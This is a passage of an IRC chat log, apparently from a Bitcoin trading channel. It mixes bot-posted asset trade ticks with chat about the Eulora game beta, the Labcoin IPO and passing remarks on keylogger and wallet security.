9 @ 0.00454 = 0.0409 BTC [-] Jul 31 18:32:41 k, cant promise anything tho Jul 31 18:32:44 i'd rather a piece of a pie than a piece of a slice Jul 31 18:33:16 [BTCTC] [ACTIVEMINING] 19 @ 0.004588 = 0.0872 BTC [+] Jul 31 18:33:39 [BTCTC] [ACTIVEMINING] 6 @ 0.004589 = 0.0275 BTC [+] Jul 31 18:33:41 [BTCTC] [ACTIVEMINING] 6 @ 0.00459 = 0.0275 BTC [+] Jul 31 18:34:12 [BTCTC] [ACTIVEMINING] 7 @ 0.00459 = 0.0321 BTC [+] Jul 31 18:35:44 [BTCTC] [ACTIVEMINING] 15 @ 0.004609 = 0.0691 BTC [+] Jul 31 18:36:34 or a piece of shit Jul 31 18:36:42 [BTCTC] [ACTIVEMINING] 12 @ 0.00455 = 0.0546 BTC [-] Jul 31 18:37:08 yum Jul 31 18:37:10 lets agree on a smidge of a pie? Jul 31 18:37:12 now we're talking Jul 31 18:37:47 [BTCTC] [ACTIVEMINING] 30 @ 0.00461 = 0.1383 BTC [+] Jul 31 18:37:49 [BTCTC] [ACTIVEMINING] 270 @ 0.004694 = 1.2674 BTC [+] Jul 31 18:38:42 [BTCTC] [ACTIVEMINING] 10 @ 0.004693 = 0.0469 BTC [-] Jul 31 18:38:43 [BTCTC] [ACTIVEMINING] 150 @ 0.004694 = 0.7041 BTC [+] Jul 31 18:40:30 [BTCTC] [ACTIVEMINING] 25 @ 0.004601 = 0.115 BTC [-] Jul 31 18:40:33 [BTCTC] [ACTIVEMINING] 1500 @ 0.0046 = 6.9 BTC [-] Jul 31 18:40:58 [BTCTC] [BASIC-MINING] 3 @ 0.4136 = 1.2408 BTC [+] Jul 31 18:40:59 [BTCTC] [ACTIVEMINING] 117 @ 0.004691 = 0.5488 BTC [+] Jul 31 18:41:02 [BTCTC] [BASIC-MINING] 2 @ 0.4137 = 0.8274 BTC [+] Jul 31 18:41:04 [BTCTC] [ACTIVEMINING] 83 @ 0.004693 = 0.3895 BTC [+] Jul 31 18:41:07 [BTCTC] [BASIC-MINING] 3 @ 0.4138 = 1.2414 BTC [+] Jul 31 18:41:09 [BTCTC] [BASIC-MINING] 5 @ 0.4159 = 2.0795 BTC [+] Jul 31 18:41:12 [BTCTC] [BASIC-MINING] 11 @ 0.416 = 4.576 BTC [+] Jul 31 18:41:14 [BTCTC] [BASIC-MINING] 2 @ 0.4199 = 0.8398 BTC [+] Jul 31 18:41:15 [BTCTC] [BASIC-MINING] 5 @ 0.42 = 2.1 BTC [+] Jul 31 18:42:03 [BTCTC] [BASIC-MINING] 12 @ 0.4241 = 5.0892 BTC [+] Jul 31 18:42:13 somebody sell me btc for paypal Jul 31 18:42:25 no funny business, I promise Jul 31 18:42:39 [BTCTC] [ACTIVEMINING] 25 @ 0.004589 = 0.1147 BTC [-] Jul 31 18:42:41 [BTCTC] [ACTIVEMINING] 11 @ 0.00459 = 0.0505 BTC [+] Jul 31 18:42:44 [BTCTC] [ACTIVEMINING] 50 @ 0.004692 = 0.2346 BTC [+] Jul 31 18:42:46 [BTCTC] [ACTIVEMINING] 117 @ 0.004693 = 0.5491 BTC [+] Jul 31 18:42:48 [BTCTC] [ACTIVEMINING] 10 @ 0.004694 = 0.0469 BTC [+] Jul 31 18:42:49 [BTCTC] [ACTIVEMINING] 91 @ 0.004695 = 0.4272 BTC [+] Jul 31 18:42:51 [BTCTC] [ACTIVEMINING] 183 @ 0.004696 = 0.8594 BTC [+] Jul 31 18:42:53 [BTCTC] [ACTIVEMINING] 8 @ 0.004699 = 0.0376 BTC [+] Jul 31 18:42:54 [BTCTC] [ACTIVEMINING] 17 @ 0.0047 = 0.0799 BTC [+] Jul 31 18:43:08 [MPEX] [S.MPOE] 6500 @ 0.00079525 = 5.1691 BTC [+] Jul 31 18:44:26 [BTCTC] [TAT.ASICMINER] 14 @ 0.03913 = 0.5478 BTC [-] Jul 31 18:44:28 [BTCTC] [TAT.ASICMINER] 50 @ 0.03913 = 1.9565 BTC [-] Jul 31 18:44:31 [BTCTC] [TAT.ASICMINER] 5 @ 0.0391 = 0.1955 BTC [-] Jul 31 18:44:34 [BTCTC] [TAT.ASICMINER] 13 @ 0.039 = 0.507 BTC [-] Jul 31 18:44:37 [BTCTC] [TAT.ASICMINER] 3 @ 0.03864 = 0.1159 BTC [-] Jul 31 18:44:45 ;;rated afrotec Jul 31 18:44:45 [BTCTC] [ACTIVEMINING] 5 @ 0.004804 = 0.024 BTC [+] Jul 31 18:44:45 You have not yet rated user afrotec Jul 31 18:44:55 ;;getrating afrotec Jul 31 18:44:56 This user has not yet been rated. WARNING: Currently not authenticated. Jul 31 18:44:56 [BTCTC] [ASICMINER-PT] 1 @ 4.071 BTC [+] Jul 31 18:44:58 [BTCTC] [ASICMINER-PT] 1 @ 4.07 BTC [-] Jul 31 18:45:12 bah Jul 31 18:45:19 [BTCTC] [ACTIVEMINING] 11 @ 0.004805 = 0.0529 BTC [+] Jul 31 18:45:32 http://trilema.com/2013/noob-mp-or-how-it-all-began/ Jul 31 18:45:35 afrotec ^ Jul 31 18:45:36 Noob MP, or how it all began pe Trilema - Un blog de Mircea Popescu. Jul 31 18:45:59 [BTCTC] [ACTIVEMINING] 10 @ 0.004879 = 0.0488 BTC [+] Jul 31 18:46:01 [BTCTC] [ASICMINER-PT] 2 @ 4.02 = 8.04 BTC [-] Jul 31 18:46:02 [BTCTC] [ACTIVEMINING] 315 @ 0.004899 = 1.5432 BTC [+] Jul 31 18:46:14 [BTCTC] [ACTIVEMINING] 630 @ 0.0049 = 3.087 BTC [+] Jul 31 18:46:17 [BTCTC] [ACTIVEMINING] 245 @ 0.005189 = 1.2713 BTC [+] Jul 31 18:46:34 [BTCTC] [ACTIVEMINING] 1 @ 0.004879 BTC [-] Jul 31 18:47:33 [BTCTC] [ACTIVEMINING] 10 @ 0.004898 = 0.049 BTC [+] Jul 31 18:47:36 [BTCTC] [ACTIVEMINING] 18 @ 0.00495 = 0.0891 BTC [+] Jul 31 18:47:38 [BTCTC] [ACTIVEMINING] 102 @ 0.00519 = 0.5294 BTC [+] Jul 31 18:47:42 mircea_popescu, thanks im looking into that now Jul 31 18:49:06 [BTCTC] [BASIC-MINING] 2 @ 0.424 = 0.848 BTC [-] Jul 31 18:49:34 [BTCTC] [ACTIVEMINING] 25 @ 0.005185 = 0.1296 BTC [-] Jul 31 18:49:34 [BTCTC] [DMS.MINING] 5 @ 0.007351 = 0.0368 BTC [+] Jul 31 18:49:35 i smell a scammer Jul 31 18:49:36 [BTCTC] [ACTIVEMINING] 50 @ 0.005186 = 0.2593 BTC [+] Jul 31 18:50:25 who? Jul 31 18:50:30 [BTCTC] [ACTIVEMINING] 10 @ 0.005185 = 0.0519 BTC [-] Jul 31 18:50:47 sniff sniff Jul 31 18:51:01 [BTCTC] [ACTIVEMINING] 15 @ 0.005185 = 0.0778 BTC [-] Jul 31 18:51:13 [BTCTC] [ACTIVEMINING] 19 @ 0.005186 = 0.0985 BTC [+] Jul 31 18:51:50 [HAVELOCK] [AM100] 10 @ 0.0403999 = 0.404 BTC [+] Jul 31 18:52:49 [BTCTC] [ACTIVEMINING] 23 @ 0.004811 = 0.1107 BTC [-] Jul 31 18:52:51 [HAVELOCK] [SDSTM] 1 @ 0.00889 BTC [-] Jul 31 18:53:34 [BTCTC] [ACTIVEMINING] 25 @ 0.004811 = 0.1203 BTC [-] Jul 31 18:53:37 [BTCTC] [ACTIVEMINING] 317 @ 0.00481 = 1.5248 BTC [-] Jul 31 18:53:50 [BTCTC] [ACTIVEMINING] 25 @ 0.005014 = 0.1254 BTC [+] Jul 31 18:53:51 [BTCTC] [ACTIVEMINING] 50 @ 0.005015 = 0.2508 BTC [+] Jul 31 18:53:53 [BTCTC] [ACTIVEMINING] 50 @ 0.005187 = 0.2594 BTC [+] Jul 31 18:53:55 [BTCTC] [ACTIVEMINING] 12 @ 0.00519 = 0.0623 BTC [+] Jul 31 18:53:56 [BTCTC] [ACTIVEMINING] 549 @ 0.005199 = 2.8543 BTC [+] Jul 31 18:53:58 [BTCTC] [ACTIVEMINING] 314 @ 0.0052 = 1.6328 BTC [+] Jul 31 18:55:06 [HAVELOCK] [SDSTM] 20 @ 0.008899 = 0.178 BTC [+] Jul 31 18:57:15 [BTCTC] [ACTIVEMINING] 25 @ 0.005099 = 0.1275 BTC [-] Jul 31 18:57:17 [BTCTC] [ACTIVEMINING] 15 @ 0.0051 = 0.0765 BTC [+] Jul 31 18:58:13 [BTCTC] [ACTIVEMINING] 25 @ 0.005101 = 0.1275 BTC [+] Jul 31 18:58:15 [BTCTC] [ACTIVEMINING] 33 @ 0.0051 = 0.1683 BTC [-] Jul 31 18:58:27 http://trilema.com/2013/its-called-eulora/ Jul 31 18:58:31 It’s called Eulora pe Trilema - Un blog de Mircea Popescu. Jul 31 18:59:46 [BTCTC] [TAT.ASICMINER] 1 @ 0.04097 BTC [+] Jul 31 19:00:27 [BTCTC] [TAT.ASICMINER] 1 @ 0.04097 BTC [+] Jul 31 19:00:46 it downloads too slowly :P Jul 31 19:00:47 so it's linux-first? nice Jul 31 19:02:26 Also if you’re good with code and would like to help => is the code open? Jul 31 19:03:10 [HAVELOCK] [AM100] 3 @ 0.0403999 = 0.1212 BTC [+] Jul 31 19:03:21 yea Jul 31 19:03:36 [MPEX] [S.MPOE] 5100 @ 0.00079398 = 4.0493 BTC [-] Jul 31 19:03:47 what language? Jul 31 19:04:00 Intercal :D Jul 31 19:04:20 pankkake mostly c. it rests on cal3d and stuiff the atomic blue peeps did Jul 31 19:04:55 ok. not my set of skills but not surprising for a game :) Jul 31 19:05:12 yeah i doubt you can seriously do much w/o c Jul 31 19:05:55 well, some games use a scripting language inside for some stuff Jul 31 19:06:36 Facebook Jul 31 19:06:45 4Chan or Reddit Jul 31 19:06:58 I'm joking also Jul 31 19:07:07 [BTCTC] [ACTIVEMINING] 1 @ 0.005198 BTC [+] Jul 31 19:07:09 Maybe dropbox.com ? Jul 31 19:07:25 it's a very good question, I found one once but forgot Jul 31 19:07:32 most don't have expirations like pastebins Jul 31 19:07:48 you can use imgur and save the delete url… Jul 31 19:07:54 imgur then Jul 31 19:08:12 am divs come in yet? Jul 31 19:08:26 ActM discussion -> #ActiveMining :) Jul 31 19:08:37 i think so, not sure Jul 31 19:09:19 depends on your definition of bot Jul 31 19:09:30 hey guys, what is a good site to post a temp pic up for, like maybe 24 hours? << images.prism.nsa.gov Jul 31 19:09:32 he's hired by ken Jul 31 19:09:40 out of curiosity Chaang-Noi, is your first name Samuel ? Jul 31 19:09:59 Achmed the dead terrorist? Jul 31 19:10:01 lol Jul 31 19:10:09 akmed sounds legit Jul 31 19:10:33 [BTCTC] [TAT.MINIGAME] 10 @ 0.000295 = 0.003 BTC [+] Jul 31 19:10:36 k Jul 31 19:10:46 as in kkk? Jul 31 19:10:51 Chaang-Noi: why would I be a bot? Jul 31 19:11:10 what am I trolling? Jul 31 19:11:30 Chaang-Noi: you can speak for 149 users then? Jul 31 19:11:34 nobody likes visual basic script files @ Vbs Jul 31 19:12:16 [BTCTC] [TAT.MINIGAME] 4 @ 0.000295 = 0.0012 BTC [+] Jul 31 19:12:21 mircea_popescu: confess. your game is actually a challenge for exploit developers Jul 31 19:12:24 feel free to put me in your ignore list then Jul 31 19:12:36 [BTCTC] [ACTIVEMINING] 25 @ 0.005198 = 0.13 BTC [+] Jul 31 19:12:39 mircea_popescu: think of all the fools that will run it on their bitcoind box. Jul 31 19:13:51 [BTCTC] [TAT.MINIGAME] 1898 @ 0.000295 = 0.5599 BTC [+] Jul 31 19:13:54 [BTCTC] [TAT.MINIGAME] 1 @ 0.000303 BTC [+] Jul 31 19:14:11 [BTCTC] [TAT.MINIGAME] 1500 @ 0.0003075 = 0.4613 BTC [+] Jul 31 19:14:15 [BTCTC] [TAT.MINIGAME] 14 @ 0.0003149 = 0.0044 BTC [+] Jul 31 19:14:40 [BTCTC] [TAT.MINIGAME] 5000 @ 0.000315 = 1.575 BTC [+] Jul 31 19:14:41 [BTCTC] [ASICMINER-PT] 8 @ 4.7 = 37.6 BTC [+] Jul 31 19:14:42 [BTCTC] [TAT.MINIGAME] 5000 @ 0.00033 = 1.65 BTC [+] Jul 31 19:15:12 Chaang-Noi: banned for...? Jul 31 19:15:38 [BTCTC] [ASICMINER-PT] 1 @ 4.18 BTC [-] Jul 31 19:15:59 asciilifeform: that was my first thought. my wallet's encrypted though, but I have much more compromising stuff! Jul 31 19:16:26 Shit Labcoin has a little over 12million bids at .001+ Jul 31 19:16:37 [BTCTC] [TAT.ASICMINER] 64 @ 0.04097 = 2.6221 BTC [+] Jul 31 19:16:54 pankkake: an encrypted wallet does you little good when your machine is rooted and all keystrokes are logged. Jul 31 19:17:06 [BTCTC] [ACTIVEMINING] 25 @ 0.004923 = 0.1231 BTC [-] Jul 31 19:17:08 [BTCTC] [TAT.MINIGAME] 1000 @ 0.0003332 = 0.3332 BTC [+] Jul 31 19:17:10 [BTCTC] [ACTIVEMINING] 22 @ 0.004922 = 0.1083 BTC [-] Jul 31 19:17:13 yeah Jul 31 19:17:15 [BTCTC] [ACTIVEMINING] 20 @ 0.00492 = 0.0984 BTC [-] Jul 31 19:17:19 pankkake: presumably you do at times enter the password. Jul 31 19:17:20 [BTCTC] [ACTIVEMINING] 26 @ 0.004903 = 0.1275 BTC [-] Jul 31 19:17:24 [BTCTC] [ACTIVEMINING] 27 @ 0.004902 = 0.1324 BTC [-] Jul 31 19:17:38 [BTCTC] [ACTIVEMINING] 300 @ 0.005199 = 1.5597 BTC [+] Jul 31 19:17:39 [BTCTC] [BASIC-MINING] 1 @ 0.4234 BTC [-] Jul 31 19:17:40 [BTCTC] [ACTIVEMINING] 463 @ 0.00521 = 2.4122 BTC [+] Jul 31 19:17:42 [BTCTC] [ACTIVEMINING] 183 @ 0.005217 = 0.9547 BTC [+] Jul 31 19:17:44 [BTCTC] [ACTIVEMINING] 500 @ 0.00535 = 2.675 BTC [+] Jul 31 19:17:46 [BTCTC] [ACTIVEMINING] 225 @ 0.005375 = 1.2094 BTC [+] Jul 31 19:18:02 [BTCTC] [ACTIVEMINING] 23 @ 0.004902 = 0.1127 BTC [-] Jul 31 19:18:04 [BTCTC] [TAT.MINIGAME] 900 @ 0.0003332 = 0.2999 BTC [+] Jul 31 19:18:06 [BTCTC] [ACTIVEMINING] 2 @ 0.0049 = 0.0098 BTC [-] Jul 31 19:18:15 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.002934 BTC [+] Jul 31 19:18:18 [BTCTC] [TAT.VIRTUALMINE] 50 @ 0.002935 = 0.1468 BTC [+] Jul 31 19:18:22 [BTCTC] [TAT.VIRTUALMINE] 108 @ 0.002936 = 0.3171 BTC [+] Jul 31 19:18:22 it has to run continuously though, it can be caught; whereas just sending the file at a random time is more sneaky Jul 31 19:18:23 [BTCTC] [TAT.VIRTUALMINE] 41 @ 0.002937 = 0.1204 BTC [+] Jul 31 19:18:31 Chaang-Noi: looool Jul 31 19:18:54 imgur: the simple image sharer Jul 31 19:18:59 Chaang-Noi: yes Jul 31 19:18:59 [BTCTC] [ASICMINER-PT] 4 @ 4.179 = 16.716 BTC [-] Jul 31 19:19:04 [MPEX] [S.MG] 15000 @ 0.0002675 = 4.0125 BTC [+] Jul 31 19:19:29 took long enough for the active miner bubble to pop Jul 31 19:19:33 Chaang-Noi: I'm January 2012 new +/- :) Jul 31 19:19:55 btc Jul 31 19:20:26 [BTCTC] [TAT.MINIGAME] 6 @ 0.000333 = 0.002 BTC [-] Jul 31 19:20:31 you said I was trolling because I wrote 1 line of text Jul 31 19:20:38 [BTCTC] [ASICMINER-PT] 1 @ 4.179 BTC [-] Jul 31 19:20:42 where's the trolling in that? Jul 31 19:20:56 [HAVELOCK] [AM100] 3 @ 0.0403999 = 0.1212 BTC [+] Jul 31 19:21:07 [BTCTC] [TAT.ASICMINER] 1 @ 0.04097 BTC [+] Jul 31 19:21:11 if your response was following the mention of "AM", it was trolling Jul 31 19:21:27 [HAVELOCK] [AM100] 31 @ 0.0404 = 1.2524 BTC [+] Jul 31 19:21:57 I never mentioned "AM" Jul 31 19:21:59 i'm just glad ken posted bail Jul 31 19:22:07 [BTCTC] [BASIC-MINING] 1 @ 0.4 BTC [-] Jul 31 19:22:11 I said "ActM discussion -> #ActiveMining :)" Jul 31 19:22:15 http://thegenesisblock.com/bitcoin-protocol-analysis-native-two-factor-authentication/ Jul 31 19:22:23 [Bitcoin Protocol Analysis] Native Two-Factor Authentication - The Genesis Block Jul 31 19:22:23 where's the "AM"? Jul 31 19:22:25 mircea_popescu: it's spreading like a virus Jul 31 19:23:12 I would be trolling if I was somehow misleading anyone Jul 31 19:23:17 I'm not :) Jul 31 19:25:11 lol Jul 31 19:25:21 reported! Jul 31 19:25:31 takes me back to my wow days Jul 31 19:25:56 I think it takes me back to my kindergarden days lol Jul 31 19:26:32 We had a journal on the wall anyone could write Jul 31 19:26:42 (in elementary school) Jul 31 19:26:48 asciilifeform how's an airgapped machine keylogged Jul 31 19:26:55 and wtf would the keylogger do, scream the key ? Jul 31 19:27:01 was this a recent memory? Jul 31 19:27:33 [BTCTC] [S.MPOE-PT] 50 @ 0.0008328 = 0.0416 BTC [-] Jul 31 19:27:33 Rulother_: what memory? I'm there right now! xD Jul 31 19:27:39 mircea_popescu: your Dr. Evil mountain vault is safe. I'm talking about 'normal people' and their humble toilet-in-the-kitchen linux boxen. Jul 31 19:28:11 [BTCTC] [DMS.MINING] 211 @ 0.007501 = 1.5827 BTC [+] Jul 31 19:28:14 [BTCTC] [DMS.MINING] 333 @ 0.0075 = 2.4975 BTC [-] Jul 31 19:28:32 normal people can very well buy a cheap 2nd hand laptop off ebay Jul 31 19:28:37 for about the cost of a dongle Jul 31 19:28:53 mircea_popescu: yeah, but how many realize that they ought to? Jul 31 19:29:12 so the solution is, let's make retarded security theatre Jul 31 19:29:20 instead of telling the idiots what to actually do. Jul 31 19:29:30 mircea_popescu: nah, the solution is to buy popcorn Jul 31 19:29:31 cause we can't market useful, we can only market stupid. Jul 31 19:29:42 mircea_popescu: that's what I'll be doing Jul 31 19:32:06 [BTCTC] [TAT.ASICMINER] 10 @ 0.04 = 0.4 BTC [-] Jul 31 19:32:08 [BTCTC] [DMS.MINING] 61 @ 0.007375 = 0.4499 BTC [-] Jul 31 19:32:18 if I were the author of the game, and struck with an inexplicable fit of compassion for noobs, I would pop up a dialog showing the user's BTC balance if the binary detects a running bitcoind on the box, saying "boo" Jul 31 19:32:36 [BTCTC] [COGNITIVE] 2 @ 0.405 = 0.81 BTC [-] Jul 31 19:32:39 lol Jul 31 19:32:45 LOL Jul 31 19:32:49 http://i.imgur.com/8MZUrNz.jpg Jul 31 19:33:22 lol Jul 31 19:33:38 [BTCTC] [ASICMINER-PT] 2 @ 4.179 = 8.358 BTC [-] Jul 31 19:34:16 [BTCTC] [TAT.MINIGAME] 5 @ 0.000319 = 0.0016 BTC [-] Jul 31 19:34:51 mircea_popescu: your game is so massive, you could probably stuff a proper blockchain node in there, and no one would notice. Jul 31 19:35:17 [BTCTC] [PAJKA.BOND] 15 @ 0.02522 = 0.3783 BTC [-] Jul 31 19:35:25 ha. the game client is 500mb atm Jul 31 19:35:32 the blockchain 5gb ? Jul 31 19:35:32 [BTCTC] [TAT.ASICMINER] 6 @ 0.04095 = 0.2457 BTC [+] Jul 31 19:35:33 asciilifeform: just unpacked it and it includes .svn subdirectories Jul 31 19:35:37 wonder if anyone's though to combine a MMORPG and an altchain Jul 31 19:35:40 that's why Jul 31 19:35:43 people still play games? Jul 31 19:35:53 jurov yeah Jul 31 19:35:57 btct is a good game Jul 31 19:36:06 lol Jul 31 19:36:12 i love saying it Jul 31 19:36:17 so much Jul 31 19:36:19 there's .svn in the zip. boo Jul 31 19:36:30 [BTCTC] [ACTIVEMINING] 20 @ 0.005205 = 0.1041 BTC [+] Jul 31 19:36:37 [BTCTC] [ASICMINER-PT] 1 @ 4.17 BTC [-] Jul 31 19:36:58 [MPEX] [S.MPOE] 10250 @ 0.00079403 = 8.1388 BTC [+] Jul 31 19:37:33 why boo ? Jul 31 19:38:41 [BTCTC] [ASICMINER-PT] 4 @ 4.17 = 16.68 BTC [-] Jul 31 19:38:53 [BTCTC] [ACTIVEMINING] 25 @ 0.005205 = 0.1301 BTC [+] Jul 31 19:38:55 [BTCTC] [ACTIVEMINING] 12 @ 0.005204 = 0.0624 BTC [-] Jul 31 19:39:01 I don't understand why people still use it, and end-users don't need the .svn dirs Jul 31 19:39:13 but this is more for ppl who like to mess with things Jul 31 19:42:38 i wonder if the herd can be spooked enough to unfill the pre-ipo sellout of labcoin Jul 31 19:42:45 pre-volatility Jul 31 19:42:46 No cigar. failed to load driver: r600. Segmentation fault ./euclient Jul 31 19:43:11 jurov email the logstuff Jul 31 19:43:40 [BTCTC] [ASICMINER-PT] 1 @ 4.11 BTC [-] Jul 31 19:43:45 [BTCTC] [ASICMINER-PT] 1 @ 4.102 BTC [-] Jul 31 19:43:52 [BTCTC] [ASICMINER-PT] 1 @ 4.101 BTC [-] Jul 31 19:43:57 [BTCTC] [ASICMINER-PT] 1 @ 4.1 BTC [-] Jul 31 19:44:15 [BTCTC] [ASICMINER-PT] 1 @ 4.049 BTC [-] Jul 31 19:44:23 [BTCTC] [ASICMINER-PT] 2 @ 4.011 = 8.022 BTC [-] Jul 31 19:44:26 [BTCTC] [ASICMINER-PT] 3 @ 4.01 = 12.03 BTC [-] Jul 31 19:44:29 [BTCTC] [ASICMINER-PT] 1 @ 4.01 BTC [-] Jul 31 19:44:33 [BTCTC] [ASICMINER-PT] 3 @ 4.002 = 12.006 BTC [-] Jul 31 19:45:40 [BTCTC] [ASICMINER-PT] 1 @ 4.002 BTC [-] Jul 31 19:45:43 [BTCTC] [ASICMINER-PT] 9 @ 4.001 = 36.009 BTC [-] Jul 31 19:46:56 it was permission error, now it loads Jul 31 19:47:05 ah. Jul 31 19:47:26 New user? See Mircea for login account Jul 31 19:47:55 http://www.wikihow.com/Register-a-User-Name-on-Freenode Jul 31 19:47:57 How to Register a User Name on Freenode: 7 Steps (with Pictures) Jul 31 19:47:59 whoa it actually works ? wunderbar. Jul 31 19:48:44 lemme hop in so i can say hi Jul 31 19:48:57 [BTCTC] [ACTIVEMINING] 25 @ 0.005198 = 0.13 BTC [-] Jul 31 19:49:15 "4,000,000 shares of BTCGARDEN,which occupies 40% of BTCSEA CO.,Ltd`s market value, will be made available to the public at btct.co. First 2,000,000 shares will be put up in value beginning at 0.016 BTC/share ,the rest of 2,000,000 shares will be issued with higher price as soon as the first 2,000,000 shares have been sold out." Jul 31 19:49:17 [BTCTC] [ACTIVEMINING] 43 @ 0.005001 = 0.215 BTC [-] Jul 31 19:49:19 [BTCTC] [TAT.ASICMINER] 55 @ 0.04093 = 2.2512 BTC [-] Jul 31 19:49:23 'a higher price' Jul 31 19:49:30 agh bfl, ffffuuuu Jul 31 19:49:41 [BTCTC] [ACTIVEMINING] 25 @ 0.005199 = 0.13 BTC [+] Jul 31 19:49:43 [BTCTC] [ACTIVEMINING] 60 @ 0.005199 = 0.3119 BTC [+] Jul 31 19:49:47 [BTCTC] [ACTIVEMINING] 1378 @ 0.0052 = 7.1656 BTC [+] Jul 31 19:50:26 ThickAsThieves i can't decide if this is a gimped copy of mpex asset issuance process Jul 31 19:50:35 or the guy is ignorant and would benefit from lurk moar Jul 31 19:50:53 [BTCTC] [ACTIVEMINING] 185 @ 0.005001 = 0.9252 BTC [-] Jul 31 19:52:39 i see some other players but nobody seems online Jul 31 19:53:13 say something Jul 31 19:53:25 [BTCTC] [ASICMINER-PT] 1 @ 4.001 BTC [-] Jul 31 19:53:28 [BTCTC] [ASICMINER-PT] 3 @ 3.96 = 11.88 BTC [-] Jul 31 19:54:34 [BTCTC] [TAT.ASICMINER] 15 @ 0.04001 = 0.6002 BTC [-] Jul 31 19:54:36 [BTCTC] [TAT.ASICMINER] 1 @ 0.04001 BTC [-] Jul 31 19:54:40 [BTCTC] [TAT.ASICMINER] 25 @ 0.04001 = 1.0003 BTC [-] Jul 31 19:54:42 Burnside is fixing the labcoin ipo Jul 31 19:54:42 [BTCTC] [TAT.ASICMINER] 85 @ 0.04001 = 3.4009 BTC [-] Jul 31 19:54:46 [BTCTC] [TAT.ASICMINER] 5 @ 0.04 = 0.2 BTC [-] Jul 31 19:55:09 3 PM CST/4 PM EST is the cutoff for bidding. (EDITED!) Jul 31 19:55:09 - Sometime shortly after that time I will lock the asset. Jul 31 19:55:09 - All bids below 0.001 will be thrown out. Jul 31 19:55:09 - All bids posted after the cutoff will be thrown out. Jul 31 19:55:09 - We will then add up all the bids and use the total to create a ratio of number of shares ordered to number of shares available. (eg, 9,000,000 ordered, 7,000,000 available gives us a ratio of 0.777) Jul 31 19:55:09 - We will multiply everyone's orders times the ratio and extract a whole number of shares on a per order basis. The orders will then be filled according to the result at 0.001 BTC. (regardless of what they actually bid.) Jul 31 19:55:24 i don't understand why everyone is jumpting ship from ASICMINER Jul 31 19:55:32 [BTCTC] [TAT.ASICMINER] 85 @ 0.04 = 3.4 BTC [-] Jul 31 19:55:49 AM has had weak news Jul 31 19:55:55 [BTCTC] [ASICMINER-PT] 2 @ 3.96 = 7.92 BTC [-] Jul 31 19:55:56 and people are hyped up Jul 31 19:56:09 [BTCTC] [COGNITIVE] 1 @ 0.401 BTC [-] Jul 31 19:56:09 ^ Jul 31 19:56:11 [BTCTC] [COGNITIVE] 5 @ 0.4 = 2 BTC [-] Jul 31 19:56:13 [BTCTC] [ACTIVEMINING] 25 @ 0.005004 = 0.1251 BTC [+] Jul 31 19:56:14 [BTCTC] [COGNITIVE] 1 @ 0.4 BTC [-] Jul 31 19:56:16 [BTCTC] [ACTIVEMINING] 50 @ 0.005003 = 0.2502 BTC [-] Jul 31 19:56:18 [BTCTC] [ACTIVEMINING] 617 @ 0.005001 = 3.0856 BTC [-] Jul 31 19:56:46 isnt that what it was it before you pumped it? Jul 31 19:56:51 [BTCTC] [ACTIVEMINING] 25 @ 0.005002 = 0.1251 BTC [+] Jul 31 19:56:54 at* Jul 31 19:56:54 [BTCTC] [ACTIVEMINING] 30 @ 0.005001 = 0.15 BTC [-] Jul 31 19:57:09 [BTCTC] [COGNITIVE] 5 @ 0.73 = 3.65 BTC [+] Jul 31 19:57:11 there is activity only in NPC channel Jul 31 19:57:28 jurov i said hi in main Jul 31 19:57:30 [BTCTC] [ACTIVEMINING] 20 @ 0.005002 = 0.1 BTC [+] Jul 31 19:57:34 do you see me up there ? Jul 31 19:58:19 mp id on't see you. shall i publish a screenshot? Jul 31 19:58:26 sure by all means Jul 31 19:58:43 [BTCTC] [ASICMINER-PT] 2 @ 3.923 = 7.846 BTC [-] Jul 31 19:58:46 [BTCTC] [ASICMINER-PT] 1 @ 3.922 BTC [-] Jul 31 19:58:50 [BTCTC] [ACTIVEMINING] 25 @ 0.005002 = 0.1251 BTC [+] Jul 31 19:58:52 [BTCTC] [ACTIVEMINING] 25 @ 0.005001 = 0.125 BTC [-] Jul 31 19:58:54 [BTCTC] [ACTIVEMINING] 87 @ 0.005 = 0.435 BTC [-] Jul 31 19:58:57 [BTCTC] [ACTIVEMINING] 4921 @ 0.005 = 24.605 BTC [-] Jul 31 19:59:25 http://live.coinbr.com/images/eulora.png Jul 31 19:59:39 ok sit put i come to you Jul 31 20:01:30 lol we're in the jacuzzi Jul 31 20:01:34 [BTCTC] [BASIC-MINING] 1 @ 0.3999 BTC [-] Jul 31 20:02:36 [BTCTC] [ASICMINER-PT] 1 @ 3.914 BTC [-] Jul 31 20:03:13 [BTCTC] [ASICMINER-PT] 1 @ 3.913 BTC [-] Jul 31 20:03:24 [HAVELOCK] [SMG] 90 @ 0.0002506 = 0.0226 BTC [-] Jul 31 20:04:21 [BTCTC] [ACTIVEMINING] 25 @ 0.004861 = 0.1215 BTC [-] Jul 31 20:04:23 [BTCTC] [ACTIVEMINING] 50 @ 0.004856 = 0.2428 BTC [-] Jul 31 20:04:26 [BTCTC] [ACTIVEMINING] 1 @ 0.004828 BTC [-] Jul 31 20:04:28 [BTCTC] [ACTIVEMINING] 100 @ 0.004827 = 0.4827 BTC [-] Jul 31 20:04:31 [BTCTC] [ACTIVEMINING] 190 @ 0.004815 = 0.9149 BTC [-] Jul 31 20:04:31 looking into inventory... "mind"? Jul 31 20:04:35 [BTCTC] [ACTIVEMINING] 660 @ 0.0046 = 3.036 BTC [-] Jul 31 20:04:40 [BTCTC] [ACTIVEMINING] 50 @ 0.004515 = 0.2258 BTC [-] Jul 31 20:04:42 [BTCTC] [ACTIVEMINING] 1 @ 0.004515 BTC [-] Jul 31 20:04:43 and no spells? Jul 31 20:04:44 uyah Jul 31 20:04:44 [BTCTC] [ACTIVEMINING] 670 @ 0.004511 = 3.0224 BTC [-] Jul 31 20:04:46 [BTCTC] [ACTIVEMINING] 1 @ 0.004317 BTC [-] Jul 31 20:04:57 for to keep stuff in mind Jul 31 20:04:58 :D Jul 31 20:05:06 [BTCTC] [ACTIVEMINING] 390 @ 0.00425 = 1.6575 BTC [-] Jul 31 20:05:09 spellbook exists (c) Jul 31 20:05:13 but not implemented yet Jul 31 20:05:52 [BTCTC] [ACTIVEMINING] 10 @ 0.00422 = 0.0422 BTC [-] Jul 31 20:05:55 [BTCTC] [ACTIVEMINING] 2140 @ 0.004214 = 9.018 BTC [-] Jul 31 20:05:59 [BTCTC] [ACTIVEMINING] 1560 @ 0.004213 = 6.5723 BTC [-] Jul 31 20:06:01 [BTCTC] [TAT.ASICMINER] 40 @ 0.039 = 1.56 BTC [-] Jul 31 20:06:02 [BTCTC] [ACTIVEMINING] 1000 @ 0.004212 = 4.212 BTC [-] Jul 31 